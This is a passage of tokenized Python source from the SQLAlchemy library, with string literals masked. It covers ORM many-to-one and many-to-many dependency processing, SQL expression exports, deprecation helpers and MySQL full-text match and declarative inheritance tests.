, prop = self . prop ) <EOL> t = self . mapper . cascade_iterator ( '<STR_LIT>' , child ) <EOL> for c , m , st_ , dct_ in t : <EOL> uowcommit . register_object ( st_ , isdelete = True ) <EOL> def process_deletes ( self , uowcommit , states ) : <EOL> if self . post_update and not self . cascade . delete_orphan and not self . passive_deletes == '<STR_LIT:all>' : <EOL> for state in states : <EOL> self . _synchronize ( state , None , None , True , uowcommit ) <EOL> if state and self . post_update : <EOL> history = uowcommit . get_attribute_history ( <EOL> state , <EOL> self . key , <EOL> self . _passive_delete_flag ) <EOL> if history : <EOL> self . _post_update ( <EOL> state , uowcommit , history . sum ( ) , <EOL> is_m2o_delete = True ) <EOL> def process_saves ( self , uowcommit , states ) : <EOL> for state in states : <EOL> history = uowcommit . get_attribute_history ( <EOL> state , <EOL> self . key , <EOL> attributes . PASSIVE_NO_INITIALIZE ) <EOL> if history : <EOL> if history . added : <EOL> for child in history . added : <EOL> self . _synchronize ( state , child , None , False , <EOL> uowcommit , "<STR_LIT>" ) <EOL> if self . post_update : <EOL> self . _post_update ( state , uowcommit , history . sum ( ) ) <EOL> def _synchronize ( self , state , child , associationrow , <EOL> clearkeys , uowcommit , operation = None ) : <EOL> if state is None or ( not self . post_update and uowcommit . is_deleted ( state ) ) : <EOL> return <EOL> if operation is not None and child is not None and not uowcommit . session . _contains_state ( child ) : <EOL> util . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( mapperutil . state_class_str ( child ) , operation , self . prop ) ) <EOL> return <EOL> if clearkeys or child is None : <EOL> sync . clear ( state , self . parent , self . prop . synchronize_pairs ) <EOL> else : <EOL> self . _verify_canload ( child ) <EOL> sync . populate ( child , self . mapper , state , <EOL> self . parent , <EOL> self . prop . synchronize_pairs , <EOL> uowcommit , <EOL> False ) <EOL> class DetectKeySwitch ( DependencyProcessor ) : <EOL> """<STR_LIT>""" <EOL> def per_property_preprocessors ( self , uow ) : <EOL> if self . prop . _reverse_property : <EOL> if self . passive_updates : <EOL> return <EOL> else : <EOL> if False in ( prop . passive_updates for <EOL> prop in self . prop . _reverse_property ) : <EOL> return <EOL> uow . register_preprocessor ( self , False ) <EOL> def per_property_flush_actions ( self , uow ) : <EOL> parent_saves = unitofwork . SaveUpdateAll ( <EOL> uow , <EOL> self . parent . base_mapper ) <EOL> after_save = unitofwork . ProcessAll ( uow , self , False , False ) <EOL> uow . dependencies . update ( [ <EOL> ( parent_saves , after_save ) <EOL> ] ) <EOL> def per_state_flush_actions ( self , uow , states , isdelete ) : <EOL> pass <EOL> def presort_deletes ( self , uowcommit , states ) : <EOL> pass <EOL> def presort_saves ( self , uow , states ) : <EOL> if not self . passive_updates : <EOL> self . _process_key_switches ( states , uow ) <EOL> def prop_has_changes ( self , uow , states , isdelete ) : <EOL> if not isdelete and self . passive_updates : <EOL> d = self . _key_switchers ( uow , states ) <EOL> return bool ( d ) <EOL> return False <EOL> def process_deletes ( self , uowcommit , states ) : <EOL> assert False <EOL> def process_saves ( self , uowcommit , states ) : <EOL> assert self . passive_updates <EOL> self . _process_key_switches ( states , uowcommit ) <EOL> def _key_switchers ( self , uow , states ) : <EOL> switched , notswitched = uow . memo ( <EOL> ( '<STR_LIT>' , self ) , <EOL> lambda : ( set ( ) , set ( ) ) <EOL> ) <EOL> allstates = switched . union ( notswitched ) <EOL> for s in states : <EOL> if s not in allstates : <EOL> if self . _pks_changed ( uow , s ) : <EOL> switched . add ( s ) <EOL> else : <EOL> notswitched . add ( s ) <EOL> return switched <EOL> def _process_key_switches ( self , deplist , uowcommit ) : <EOL> switchers = self . _key_switchers ( uowcommit , deplist ) <EOL> if switchers : <EOL> for state in uowcommit . session . identity_map . all_states ( ) : <EOL> if not issubclass ( state . class_ , self . parent . class_ ) : <EOL> continue <EOL> dict_ = state . dict <EOL> related = state . get_impl ( self . key ) . get ( <EOL> state , dict_ , passive = self . _passive_update_flag ) <EOL> if related is not attributes . PASSIVE_NO_RESULT and related is not None : <EOL> related_state = attributes . instance_state ( dict_ [ self . key ] ) <EOL> if related_state in switchers : <EOL> uowcommit . register_object ( state , <EOL> False , <EOL> self . passive_updates ) <EOL> sync . populate ( <EOL> related_state , <EOL> self . mapper , state , <EOL> self . parent , self . prop . synchronize_pairs , <EOL> uowcommit , self . passive_updates ) <EOL> def _pks_changed ( self , uowcommit , state ) : <EOL> return bool ( state . key ) and sync . source_modified ( <EOL> uowcommit , state , self . mapper , self . prop . synchronize_pairs ) <EOL> class ManyToManyDP ( DependencyProcessor ) : <EOL> def per_property_dependencies ( self , uow , parent_saves , <EOL> child_saves , <EOL> parent_deletes , <EOL> child_deletes , <EOL> after_save , <EOL> before_delete <EOL> ) : <EOL> uow . dependencies . update ( [ <EOL> ( parent_saves , after_save ) , <EOL> ( child_saves , after_save ) , <EOL> ( after_save , child_deletes ) , <EOL> ( before_delete , parent_saves ) , <EOL> ( before_delete , parent_deletes ) , <EOL> ( before_delete , child_deletes ) , <EOL> ( before_delete , child_saves ) , <EOL> ] ) <EOL> def per_state_dependencies ( self , uow , <EOL> save_parent , <EOL> delete_parent , <EOL> child_action , <EOL> after_save , before_delete , <EOL> isdelete , childisdelete ) : <EOL> if not isdelete : <EOL> if childisdelete : <EOL> uow . dependencies . update ( [ <EOL> ( save_parent , after_save ) , <EOL> ( after_save , child_action ) , <EOL> ] ) <EOL> else : <EOL> uow . dependencies . update ( [ <EOL> ( save_parent , after_save ) , <EOL> ( child_action , after_save ) , <EOL> ] ) <EOL> else : <EOL> uow . dependencies . update ( [ <EOL> ( before_delete , child_action ) , <EOL> ( before_delete , delete_parent ) <EOL> ] ) <EOL> def presort_deletes ( self , uowcommit , states ) : <EOL> if not self . passive_deletes : <EOL> for state in states : <EOL> uowcommit . get_attribute_history ( <EOL> state , <EOL> self . key , <EOL> self . _passive_delete_flag ) <EOL> def presort_saves ( self , uowcommit , states ) : <EOL> if not self . passive_updates : <EOL> for state in states : <EOL> if self . _pks_changed ( uowcommit , state ) : <EOL> history = uowcommit . get_attribute_history ( <EOL> state , <EOL> self . key , <EOL> attributes . PASSIVE_OFF ) <EOL> if not self . cascade . delete_orphan : <EOL> return <EOL> for state in states : <EOL> history = uowcommit . get_attribute_history ( <EOL> state , <EOL> self . key , <EOL> attributes . PASSIVE_NO_INITIALIZE ) <EOL> if history : <EOL> for child in history . deleted : <EOL> if self . hasparent ( child ) is False : <EOL> uowcommit . register_object ( <EOL> child , isdelete = True , <EOL> operation = "<STR_LIT>" , prop = self . prop ) <EOL> for c , m , st_ , dct_ in self . mapper . cascade_iterator ( <EOL> '<STR_LIT>' , <EOL> child ) : <EOL> uowcommit . register_object ( <EOL> st_ , isdelete = True ) <EOL> def process_deletes ( self , uowcommit , states ) : <EOL> secondary_delete = [ ] <EOL> secondary_insert = [ ] <EOL> secondary_update = [ ] <EOL> processed = self . _get_reversed_processed_set ( uowcommit ) <EOL> tmp = set ( ) <EOL> for state in states : <EOL> history = uowcommit . get_attribute_history ( <EOL> state , <EOL> self . key , <EOL> self . _passive_delete_flag ) <EOL> if history : <EOL> for child in history . non_added ( ) : <EOL> if child is None or ( processed is not None and <EOL> ( state , child ) in processed ) : <EOL> continue <EOL> associationrow = { } <EOL> if not self . _synchronize ( <EOL> state , <EOL> child , <EOL> associationrow , <EOL> False , uowcommit , "<STR_LIT>" ) : <EOL> continue <EOL> secondary_delete . append ( associationrow ) <EOL> tmp . update ( ( c , state ) for c in history . non_added ( ) ) <EOL> if processed is not None : <EOL> processed . update ( tmp ) <EOL> self . _run_crud ( uowcommit , secondary_insert , <EOL> secondary_update , secondary_delete ) <EOL> def process_saves ( self , uowcommit , states ) : <EOL> secondary_delete = [ ] <EOL> secondary_insert = [ ] <EOL> secondary_update = [ ] <EOL> processed = self . _get_reversed_processed_set ( uowcommit ) <EOL> tmp = set ( ) <EOL> for state in states : <EOL> need_cascade_pks = not self . passive_updates and self . _pks_changed ( uowcommit , state ) <EOL> if need_cascade_pks : <EOL> passive = attributes . PASSIVE_OFF <EOL> else : <EOL> passive = attributes . PASSIVE_NO_INITIALIZE <EOL> history = uowcommit . get_attribute_history ( state , self . key , <EOL> passive ) <EOL> if history : <EOL> for child in history . added : <EOL> if ( processed is not None and <EOL> ( state , child ) in processed ) : <EOL> continue <EOL> associationrow = { } <EOL> if not self . _synchronize ( state , <EOL> child , <EOL> associationrow , <EOL> False , uowcommit , "<STR_LIT>" ) : <EOL> continue <EOL> secondary_insert . append ( associationrow ) <EOL> for child in history . deleted : <EOL> if ( processed is not None and <EOL> ( state , child ) in processed ) : <EOL> continue <EOL> associationrow = { } <EOL> if not self . _synchronize ( state , <EOL> child , <EOL> associationrow , <EOL> False , uowcommit , "<STR_LIT>" ) : <EOL> continue <EOL> secondary_delete . append ( associationrow ) <EOL> tmp . update ( ( c , state ) <EOL> for c in history . added + history . deleted ) <EOL> if need_cascade_pks : <EOL> for child in history . unchanged : <EOL> associationrow = { } <EOL> sync . update ( state , <EOL> self . parent , <EOL> associationrow , <EOL> "<STR_LIT>" , <EOL> self . prop . synchronize_pairs ) <EOL> sync . update ( child , <EOL> self . mapper , <EOL> associationrow , <EOL> "<STR_LIT>" , <EOL> self . prop . secondary_synchronize_pairs ) <EOL> secondary_update . append ( associationrow ) <EOL> if processed is not None : <EOL> processed . update ( tmp ) <EOL> self . _run_crud ( uowcommit , secondary_insert , <EOL> secondary_update , secondary_delete ) <EOL> def _run_crud ( self , uowcommit , secondary_insert , <EOL> secondary_update , secondary_delete ) : <EOL> connection = uowcommit . transaction . connection ( self . mapper ) <EOL> if secondary_delete : <EOL> associationrow = secondary_delete [ <NUM_LIT:0> ] <EOL> statement = self . secondary . delete ( sql . and_ ( * [ <EOL> c == sql . bindparam ( c . key , type_ = c . type ) <EOL> for c in self . secondary . c <EOL> if c . key in associationrow <EOL> ] ) ) <EOL> result = connection . execute ( statement , secondary_delete ) <EOL> if result . supports_sane_multi_rowcount ( ) and result . rowcount != len ( secondary_delete ) : <EOL> raise exc . StaleDataError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( self . secondary . description , len ( secondary_delete ) , <EOL> result . rowcount ) <EOL> ) <EOL> if secondary_update : <EOL> associationrow = secondary_update [ <NUM_LIT:0> ] <EOL> statement = self . secondary . update ( sql . and_ ( * [ <EOL> c == sql . bindparam ( "<STR_LIT>" + c . key , type_ = c . type ) <EOL> for c in self . secondary . c <EOL> if c . key in associationrow <EOL> ] ) ) <EOL> result = connection . execute ( statement , secondary_update ) <EOL> if result . supports_sane_multi_rowcount ( ) and result . rowcount != len ( secondary_update ) : <EOL> raise exc . StaleDataError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( self . secondary . description , len ( secondary_update ) , <EOL> result . rowcount ) <EOL> ) <EOL> if secondary_insert : <EOL> statement = self . secondary . insert ( ) <EOL> connection . execute ( statement , secondary_insert ) <EOL> def _synchronize ( self , state , child , associationrow , <EOL> clearkeys , uowcommit , operation ) : <EOL> self . _verify_canload ( child ) <EOL> if child is None : <EOL> return False <EOL> if child is not None and not uowcommit . session . _contains_state ( child ) : <EOL> if not child . deleted : <EOL> util . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( mapperutil . state_class_str ( child ) , operation , self . prop ) ) <EOL> return False <EOL> sync . populate_dict ( state , self . parent , associationrow , <EOL> self . prop . synchronize_pairs ) <EOL> sync . populate_dict ( child , self . mapper , associationrow , <EOL> self . prop . secondary_synchronize_pairs ) <EOL> return True <EOL> def _pks_changed ( self , uowcommit , state ) : <EOL> return sync . source_modified ( <EOL> uowcommit , <EOL> state , <EOL> self . parent , <EOL> self . prop . synchronize_pairs ) <EOL> _direction_to_processor = { <EOL> ONETOMANY : OneToManyDP , <EOL> MANYTOONE : ManyToOneDP , <EOL> MANYTOMANY : ManyToManyDP , <EOL> } </s>
<s> from . expression import ( <EOL> Alias , <EOL> ClauseElement , <EOL> ColumnCollection , <EOL> ColumnElement , <EOL> CompoundSelect , <EOL> Delete , <EOL> FromClause , <EOL> Insert , <EOL> Join , <EOL> Select , <EOL> Selectable , <EOL> TableClause , <EOL> Update , <EOL> alias , <EOL> and_ , <EOL> any_ , <EOL> all_ , <EOL> asc , <EOL> between , <EOL> bindparam , <EOL> case , <EOL> cast , <EOL> collate , <EOL> column , <EOL> delete , <EOL> desc , <EOL> distinct , <EOL> except_ , <EOL> except_all , <EOL> exists , <EOL> extract , <EOL> false , <EOL> False_ , <EOL> func , <EOL> funcfilter , <EOL> insert , <EOL> intersect , <EOL> intersect_all , <EOL> join , <EOL> label , <EOL> lateral , <EOL> literal , <EOL> literal_column , <EOL> modifier , <EOL> not_ , <EOL> null , <EOL> or_ , <EOL> outerjoin , <EOL> outparam , <EOL> over , <EOL> select , <EOL> subquery , <EOL> table , <EOL> text , <EOL> true , <EOL> True_ , <EOL> tuple_ , <EOL> type_coerce , <EOL> union , <EOL> union_all , <EOL> update , <EOL> within_group <EOL> ) <EOL> from . visitors import ClauseVisitor <EOL> def __go ( lcls ) : <EOL> global __all__ <EOL> from . . import util as _sa_util <EOL> import inspect as _inspect <EOL> __all__ = sorted ( name for name , obj in lcls . items ( ) <EOL> if not ( name . startswith ( '<STR_LIT:_>' ) or _inspect . ismodule ( obj ) ) ) <EOL> from . annotation import _prepare_annotations , Annotated <EOL> from . elements import AnnotatedColumnElement , ClauseList <EOL> from . selectable import AnnotatedFromClause <EOL> _prepare_annotations ( ColumnElement , AnnotatedColumnElement ) <EOL> _prepare_annotations ( FromClause , AnnotatedFromClause ) <EOL> _prepare_annotations ( ClauseList , Annotated ) <EOL> _sa_util . dependencies . resolve_all ( "<STR_LIT>" ) <EOL> from . import naming <EOL> __go ( locals ( ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from . . util import py33 <EOL> if py33 : <EOL> from unittest . mock import MagicMock , Mock , call , patch , ANY <EOL> else : <EOL> try : <EOL> from mock import MagicMock , Mock , call , patch , ANY <EOL> except ImportError : <EOL> raise ImportError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from . . import exc <EOL> import warnings <EOL> import re <EOL> from . langhelpers import decorator <EOL> def warn_deprecated ( msg , stacklevel = <NUM_LIT:3> ) : <EOL> warnings . warn ( msg , exc . SADeprecationWarning , stacklevel = stacklevel ) <EOL> def warn_pending_deprecation ( msg , stacklevel = <NUM_LIT:3> ) : <EOL> warnings . warn ( msg , exc . SAPendingDeprecationWarning , stacklevel = stacklevel ) <EOL> def deprecated ( version , message = None , add_deprecation_to_docstring = True ) : <EOL> """<STR_LIT>""" <EOL> if add_deprecation_to_docstring : <EOL> header = "<STR_LIT>" % ( version , ( message or '<STR_LIT>' ) ) <EOL> else : <EOL> header = None <EOL> if message is None : <EOL> message = "<STR_LIT>" <EOL> def decorate ( fn ) : <EOL> return _decorate_with_warning ( <EOL> fn , exc . SADeprecationWarning , <EOL> message % dict ( func = fn . __name__ ) , header ) <EOL> return decorate <EOL> def pending_deprecation ( version , message = None , <EOL> add_deprecation_to_docstring = True ) : <EOL> """<STR_LIT>""" <EOL> if add_deprecation_to_docstring : <EOL> header = "<STR_LIT>" % ( version , ( message or '<STR_LIT>' ) ) <EOL> else : <EOL> header = None <EOL> if message is None : <EOL> message = "<STR_LIT>" <EOL> def decorate ( fn ) : <EOL> return _decorate_with_warning ( <EOL> fn , exc . SAPendingDeprecationWarning , <EOL> message % dict ( func = fn . __name__ ) , header ) <EOL> return decorate <EOL> def _sanitize_restructured_text ( text ) : <EOL> def repl ( m ) : <EOL> type_ , name = m . group ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> if type_ in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> name += "<STR_LIT>" <EOL> return name <EOL> return re . sub ( r'<STR_LIT>' , repl , text ) <EOL> def _decorate_with_warning ( func , wtype , message , docstring_header = None ) : <EOL> """<STR_LIT>""" <EOL> message = _sanitize_restructured_text ( message ) <EOL> @ decorator <EOL> def warned ( fn , * args , ** kwargs ) : <EOL> warnings . warn ( message , wtype , stacklevel = <NUM_LIT:3> ) <EOL> return fn ( * args , ** kwargs ) <EOL> doc = func . __doc__ is not None and func . __doc__ or '<STR_LIT>' <EOL> if docstring_header is not None : <EOL> docstring_header %= dict ( func = func . __name__ ) <EOL> doc = inject_docstring_text ( doc , docstring_header , <NUM_LIT:1> ) <EOL> decorated = warned ( func ) <EOL> decorated . __doc__ = doc <EOL> return decorated <EOL> import textwrap <EOL> def _dedent_docstring ( text ) : <EOL> split_text = text . split ( "<STR_LIT:\n>" , <NUM_LIT:1> ) <EOL> if len ( split_text ) == <NUM_LIT:1> : <EOL> return text <EOL> else : <EOL> firstline , remaining = split_text <EOL> if not firstline . startswith ( "<STR_LIT:U+0020>" ) : <EOL> return firstline + "<STR_LIT:\n>" + textwrap . dedent ( remaining ) <EOL> else : <EOL> return textwrap . dedent ( text ) <EOL> def inject_docstring_text ( doctext , injecttext , pos ) : <EOL> doctext = _dedent_docstring ( doctext or "<STR_LIT>" ) <EOL> lines = doctext . split ( '<STR_LIT:\n>' ) <EOL> injectlines = textwrap . dedent ( injecttext ) . split ( "<STR_LIT:\n>" ) <EOL> if injectlines [ <NUM_LIT:0> ] : <EOL> injectlines . insert ( <NUM_LIT:0> , "<STR_LIT>" ) <EOL> blanks = [ num for num , line in enumerate ( lines ) if not line . strip ( ) ] <EOL> blanks . insert ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> inject_pos = blanks [ min ( pos , len ( blanks ) - <NUM_LIT:1> ) ] <EOL> lines = lines [ <NUM_LIT:0> : inject_pos ] + injectlines + lines [ inject_pos : ] <EOL> return "<STR_LIT:\n>" . join ( lines ) </s>
<s> from sqlalchemy . testing import eq_ , is_ <EOL> from sqlalchemy import * <EOL> from sqlalchemy . testing import fixtures <EOL> from sqlalchemy import testing <EOL> class IdiosyncrasyTest ( fixtures . TestBase ) : <EOL> __only_on__ = '<STR_LIT>' <EOL> __backend__ = True <EOL> @ testing . emits_warning ( ) <EOL> def test_is_boolean_symbols_despite_no_native ( self ) : <EOL> is_ ( <EOL> testing . db . scalar ( select ( [ cast ( true ( ) . is_ ( true ( ) ) , Boolean ) ] ) ) , <EOL> True <EOL> ) <EOL> is_ ( <EOL> testing . db . scalar ( select ( [ cast ( true ( ) . isnot ( true ( ) ) , Boolean ) ] ) ) , <EOL> False <EOL> ) <EOL> is_ ( <EOL> testing . db . scalar ( select ( [ cast ( false ( ) . is_ ( false ( ) ) , Boolean ) ] ) ) , <EOL> True <EOL> ) <EOL> class MatchTest ( fixtures . TestBase ) : <EOL> __only_on__ = '<STR_LIT>' <EOL> __backend__ = True <EOL> @ classmethod <EOL> def setup_class ( cls ) : <EOL> global metadata , cattable , matchtable <EOL> metadata = MetaData ( testing . db ) <EOL> cattable = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT:description>' , String ( <NUM_LIT:50> ) ) , <EOL> mysql_engine = '<STR_LIT>' <EOL> ) <EOL> matchtable = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT:title>' , String ( <NUM_LIT:200> ) ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> mysql_engine = '<STR_LIT>' <EOL> ) <EOL> metadata . create_all ( ) <EOL> cattable . insert ( ) . execute ( [ <EOL> { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:description>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:description>' : '<STR_LIT>' } , <EOL> ] ) <EOL> matchtable . insert ( ) . execute ( [ <EOL> { '<STR_LIT:id>' : <NUM_LIT:1> , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:2> } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:2> , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:3> , <EOL> '<STR_LIT:title>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : <NUM_LIT:2> } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:4> , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:5> , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> } <EOL> ] ) <EOL> @ classmethod <EOL> def teardown_class ( cls ) : <EOL> metadata . drop_all ( ) <EOL> def test_simple_match ( self ) : <EOL> results = ( matchtable . select ( ) . <EOL> where ( matchtable . c . title . match ( '<STR_LIT>' ) ) . <EOL> order_by ( matchtable . c . id ) . <EOL> execute ( ) . <EOL> fetchall ( ) ) <EOL> eq_ ( [ <NUM_LIT:2> , <NUM_LIT:5> ] , [ r . id for r in results ] ) <EOL> def test_not_match ( self ) : <EOL> results = ( matchtable . select ( ) . <EOL> where ( ~ matchtable . c . title . match ( '<STR_LIT>' ) ) . <EOL> order_by ( matchtable . c . id ) . <EOL> execute ( ) . <EOL> fetchall ( ) ) <EOL> eq_ ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:4> ] , [ r . id for r in results ] ) <EOL> def test_simple_match_with_apostrophe ( self ) : <EOL> results = ( matchtable . select ( ) . <EOL> where ( matchtable . c . title . match ( "<STR_LIT>" ) ) . <EOL> execute ( ) . <EOL> fetchall ( ) ) <EOL> eq_ ( [ <NUM_LIT:3> ] , [ r . id for r in results ] ) <EOL> def test_return_value ( self ) : <EOL> result = testing . db . execute ( <EOL> select ( [ <EOL> matchtable . c . title . match ( '<STR_LIT>' ) . label ( '<STR_LIT>' ) , <EOL> matchtable . c . title . match ( '<STR_LIT>' ) . label ( '<STR_LIT>' ) , <EOL> matchtable . c . title <EOL> ] ) . order_by ( matchtable . c . id ) <EOL> ) . fetchall ( ) <EOL> eq_ ( <EOL> result , <EOL> [ <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , "<STR_LIT>" ) , <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , '<STR_LIT>' ) <EOL> ] <EOL> ) <EOL> def test_or_match ( self ) : <EOL> results1 = ( matchtable . select ( ) . <EOL> where ( or_ ( matchtable . c . title . match ( '<STR_LIT>' ) , <EOL> matchtable . c . title . match ( '<STR_LIT>' ) ) ) . <EOL> order_by ( matchtable . c . id ) . <EOL> execute ( ) . <EOL> fetchall ( ) ) <EOL> eq_ ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> ] , [ r . id for r in results1 ] ) <EOL> results2 = ( matchtable . select ( ) . <EOL> where ( matchtable . c . title . match ( '<STR_LIT>' ) ) . <EOL> order_by ( matchtable . c . id ) . <EOL> execute ( ) . <EOL> fetchall ( ) ) <EOL> eq_ ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> ] , [ r . id for r in results2 ] ) <EOL> def test_and_match ( self ) : <EOL> results1 = ( matchtable . select ( ) . <EOL> where ( and_ ( matchtable . c . title . match ( '<STR_LIT>' ) , <EOL> matchtable . c . title . match ( '<STR_LIT>' ) ) ) . <EOL> execute ( ) . <EOL> fetchall ( ) ) <EOL> eq_ ( [ <NUM_LIT:5> ] , [ r . id for r in results1 ] ) <EOL> results2 = ( matchtable . select ( ) . <EOL> where ( matchtable . c . title . match ( '<STR_LIT>' ) ) . <EOL> execute ( ) . <EOL> fetchall ( ) ) <EOL> eq_ ( [ <NUM_LIT:5> ] , [ r . id for r in results2 ] ) <EOL> def test_match_across_joins ( self ) : <EOL> results = ( matchtable . select ( ) . <EOL> where ( and_ ( cattable . c . id == matchtable . c . category_id , <EOL> or_ ( cattable . c . description . match ( '<STR_LIT>' ) , <EOL> matchtable . c . title . match ( '<STR_LIT>' ) ) ) ) . <EOL> order_by ( matchtable . c . id ) . <EOL> execute ( ) . <EOL> fetchall ( ) ) <EOL> eq_ ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> ] , [ r . id for r in results ] ) <EOL> class AnyAllTest ( fixtures . TablesTest ) : <EOL> __only_on__ = '<STR_LIT>' <EOL> __backend__ = True <EOL> @ classmethod <EOL> def define_tables ( cls , metadata ) : <EOL> Table ( <EOL> '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT:value>' , Integer ) <EOL> ) <EOL> @ classmethod <EOL> def insert_data ( cls ) : <EOL> stuff = cls . tables . stuff <EOL> testing . db . execute ( <EOL> stuff . insert ( ) , <EOL> [ <EOL> { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:value>' : <NUM_LIT:1> } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:value>' : <NUM_LIT:2> } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:value>' : <NUM_LIT:3> } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:value>' : <NUM_LIT:4> } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:5> , '<STR_LIT:value>' : <NUM_LIT:5> } , <EOL> ] <EOL> ) <EOL> def test_any_w_comparator ( self ) : <EOL> stuff = self . tables . stuff <EOL> stmt = select ( [ stuff . c . id ] ) . where ( <EOL> stuff . c . value > any_ ( select ( [ stuff . c . value ] ) ) ) <EOL> eq_ ( <EOL> testing . db . execute ( stmt ) . fetchall ( ) , <EOL> [ ( <NUM_LIT:2> , ) , ( <NUM_LIT:3> , ) , ( <NUM_LIT:4> , ) , ( <NUM_LIT:5> , ) ] <EOL> ) <EOL> def test_all_w_comparator ( self ) : <EOL> stuff = self . tables . stuff <EOL> stmt = select ( [ stuff . c . id ] ) . where ( <EOL> stuff . c . value >= all_ ( select ( [ stuff . c . value ] ) ) ) <EOL> eq_ ( <EOL> testing . db . execute ( stmt ) . fetchall ( ) , <EOL> [ ( <NUM_LIT:5> , ) ] <EOL> ) <EOL> def test_any_literal ( self ) : <EOL> stuff = self . tables . stuff <EOL> stmt = select ( [ <NUM_LIT:4> == any_ ( select ( [ stuff . c . value ] ) ) ] ) <EOL> is_ ( <EOL> testing . db . execute ( stmt ) . scalar ( ) , True <EOL> ) </s>
<s> from sqlalchemy . testing import eq_ , assert_raises , assert_raises_message , is_ <EOL> from sqlalchemy . ext import declarative as decl <EOL> import sqlalchemy as sa <EOL> from sqlalchemy import testing <EOL> from sqlalchemy import Integer , String , ForeignKey <EOL> from sqlalchemy . testing . schema import Table , Column <EOL> from sqlalchemy . orm import relationship , create_session , class_mapper , configure_mappers , clear_mappers , polymorphic_union , deferred , Session <EOL> from sqlalchemy . ext . declarative import declared_attr , AbstractConcreteBase , ConcreteBase , has_inherited_table <EOL> from sqlalchemy . testing import fixtures , mock <EOL> Base = None <EOL> class DeclarativeTestBase ( fixtures . TestBase , testing . AssertsExecutionResults ) : <EOL> def setup ( self ) : <EOL> global Base <EOL> Base = decl . declarative_base ( testing . db ) <EOL> def teardown ( self ) : <EOL> Session . close_all ( ) <EOL> clear_mappers ( ) <EOL> Base . metadata . drop_all ( ) <EOL> class DeclarativeInheritanceTest ( DeclarativeTestBase ) : <EOL> def test_we_must_copy_mapper_args ( self ) : <EOL> class Person ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> class Engineer ( Person ) : <EOL> primary_language = Column ( String ( <NUM_LIT:50> ) ) <EOL> assert '<STR_LIT>' not in Person . __mapper_args__ <EOL> assert class_mapper ( Engineer ) . polymorphic_identity is None <EOL> assert class_mapper ( Engineer ) . polymorphic_on is Person . __table__ . c . type <EOL> def test_we_must_only_copy_column_mapper_args ( self ) : <EOL> class Person ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> a = Column ( Integer ) <EOL> b = Column ( Integer ) <EOL> c = Column ( Integer ) <EOL> d = Column ( Integer ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:a>' , <EOL> '<STR_LIT>' : '<STR_LIT:bar>' , <EOL> '<STR_LIT>' : [ '<STR_LIT:id>' , '<STR_LIT:a>' , '<STR_LIT:b>' ] , <EOL> } <EOL> assert class_mapper ( Person ) . version_id_col == '<STR_LIT:a>' <EOL> assert class_mapper ( Person ) . include_properties == set ( [ '<STR_LIT:id>' , '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> def test_custom_join_condition ( self ) : <EOL> class Foo ( Base ) : <EOL> __tablename__ = '<STR_LIT:foo>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True ) <EOL> class Bar ( Foo ) : <EOL> __tablename__ = 